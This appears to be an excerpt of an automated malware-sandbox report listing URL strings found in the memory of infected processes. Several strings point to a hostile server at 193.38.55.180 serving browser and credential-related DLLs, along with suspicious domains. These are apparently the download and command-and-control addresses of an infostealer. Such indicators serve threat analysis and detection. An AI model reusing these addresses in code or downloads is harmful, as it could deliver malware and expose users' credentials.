Source: AppLaunch.exe, 00000014.00000003.446625470.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll.dll.
Source: AppLaunch.exe, 00000014.00000003.446625470.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll.dllTa
Source: AppLaunch.exe, 00000014.00000003.446625470.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dlll
Source: AppLaunch.exe, 00000014.00000003.446625470.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dllll$aN
Source: AppLaunch.exe, 00000014.00000003.446625470.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dllva
Source: AppLaunch.exe, 00000014.00000003.438080806.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.430460941.0000000000994000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.446625470.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491953856.0000000000997000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.435077171.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.435501307.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.435628983.000000000099C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
Source: AppLaunch.exe, 00000014.00000003.435501307.0000000000989000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll%t
Source: AppLaunch.exe, 00000014.00000003.438080806.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.446625470.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.435077171.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll4
Source: AppLaunch.exe, 00000014.00000003.435077171.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlll.
Source: AppLaunch.exe, 00000014.00000003.438080806.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.446625470.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.435077171.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlllNa
Source: AppLaunch.exe, 00000014.00000003.463697854.0000000000986000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.438782493.000000000098C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.448167901.000000000098E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.452001090.000000000098C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.446575599.0000000000978000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.433723562.000000000099C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
Source: AppLaunch.exe, 00000014.00000003.435557746.000000000098C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.433410856.000000000098E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.438782493.000000000098C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll$
Source: AppLaunch.exe, 00000014.00000002.491896643.0000000000985000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449582597.000000000098C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.435557746.000000000098C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.433410856.000000000098E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464558088.000000000098E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.446812259.000000000098E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.438782493.000000000098C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.448167901.000000000098E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.452001090.000000000098C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll3
Source: AppLaunch.exe, 00000014.00000002.491896643.0000000000985000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.433206696.0000000000985000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464536562.0000000000986000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463697854.0000000000986000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll;p
Source: AppLaunch.exe, 00000014.00000003.433206696.0000000000985000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dllQp
Source: AppLaunch.exe, 00000014.00000003.435557746.000000000098C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.433410856.000000000098E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dllw
Source: AppLaunch.exe, 00000014.00000003.449081016.0000000000963000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449553500.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.430460941.0000000000994000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491953856.0000000000997000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
Source: AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll4
Source: AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlldll.
Source: AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlldllTa
Source: AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlldllx
Source: AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dllha
Source: AppLaunch.exe, 00000014.00000003.449553500.0000000000989000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dllvcruntime140.dll7tI
Source: AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
Source: AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll.dll
Source: AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll4
Source: AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlldllTa
Source: AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlll
Source: AppLaunch.exe, 00000014.00000003.463034703.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451958511.0000000000989000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dllvcruntime140.dll7tI
Source: AppLaunch.exe, 00000014.00000003.446776271.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.436096342.0000000000963000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.438080806.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463723727.000000000098A000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449553500.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.438544129.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.430460941.0000000000994000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.446625470.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463034703.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491953856.0000000000997000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451958511.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.448063318.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
Source: AppLaunch.exe, 00000014.00000003.438080806.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll.
Source: AppLaunch.exe, 00000014.00000003.438080806.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllTa
Source: AppLaunch.exe, 00000014.00000003.446776271.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463723727.000000000098A000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449553500.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.438544129.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463034703.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451958511.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.448063318.0000000000989000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dlliu
Source: AppLaunch.exe, 00000014.00000003.449157427.000000000096C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447660808.0000000000967000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462922977.000000000096C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.446448259.0000000000967000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464415044.000000000096C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451546591.000000000096C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491668088.0000000000965000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463600784.000000000096C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.436322575.0000000000967000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllk4
Source: AppLaunch.exe, 00000014.00000003.438080806.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.446625470.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllx
Source: softokn3.dll.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3.dll.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 253.exe, 00000012.00000003.448775115.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, 253.exe, 00000012.00000002.455029917.00000000007FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: softokn3.dll.20.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.20.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: softokn3.dll.20.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.20.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: softokn3.dll.20.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.20.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: softokn3.dll.20.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 00000011.00000002.432805078.00000000030E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.380622213.0000000000648000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.379324807.0000000000350000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://furubujjul.net/
Source: explorer.exe, 00000011.00000002.432805078.00000000030E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.380622213.0000000000648000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.379324807.0000000000350000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://furubujjul.net/Mozilla/5.0
Source: 253.exe, 0000000E.00000002.450132397.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, 253.exe, 00000012.00000000.420031906.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 253.exe, 00000012.00000002.451482759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 253.exe, 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: softokn3.dll.20.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.20.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.20.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: softokn3.dll.20.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: 253.exe, 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: sqlite3.dll.20.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: rE5287BD83io.20.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 253.exe, 00000012.00000002.454048007.0000000000787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/
Source: 253.exe, 00000012.00000002.454048007.0000000000787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/B
Source: 253.exe, 0000000E.00000002.450132397.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, 253.exe, 00000012.00000000.420031906.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 253.exe, 00000012.00000002.454048007.0000000000787000.00000004.00000020.00020000.00000000.sdmp, 253.exe, 00000012.00000002.451482759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 253.exe, 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: 253.exe, 00000012.00000002.454048007.0000000000787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonZ
Source: 253.exe, 00000012.00000002.454048007.0000000000787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json_
Source: 253.exe, 00000012.00000002.454048007.0000000000787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonc
Source: 253.exe, 00000012.00000002.454048007.0000000000787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonn
Source: rE5287BD83io.20.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: rE5287BD83io.20.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 00000011.00000003.426455273.0000000003140000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464332738.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, 64FF.tmp.17.dr, rE5287BD83io.20.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: rE5287BD83io.20.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 959.exe.1.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: softokn3.dll.20.dr String found in binary or memory: https://mozilla.org0
Source: explorer.exe, 00000011.00000003.426455273.0000000003140000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464332738.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, 64FF.tmp.17.dr, rE5287BD83io.20.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: explorer.exe, 00000011.00000003.426455273.0000000003140000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464332738.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, 64FF.tmp.17.dr, rE5287BD83io.20.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: explorer.exe, 00000011.00000003.426455273.0000000003140000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464332738.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, 64FF.tmp.17.dr, rE5287BD83io.20.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: explorer.exe, 00000011.00000003.426455273.0000000003140000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464332738.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, 64FF.tmp.17.dr, rE5287BD83io.20.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: softokn3.dll.20.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000011.00000003.426455273.0000000003140000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464332738.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, 64FF.tmp.17.dr, rE5287BD83io.20.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
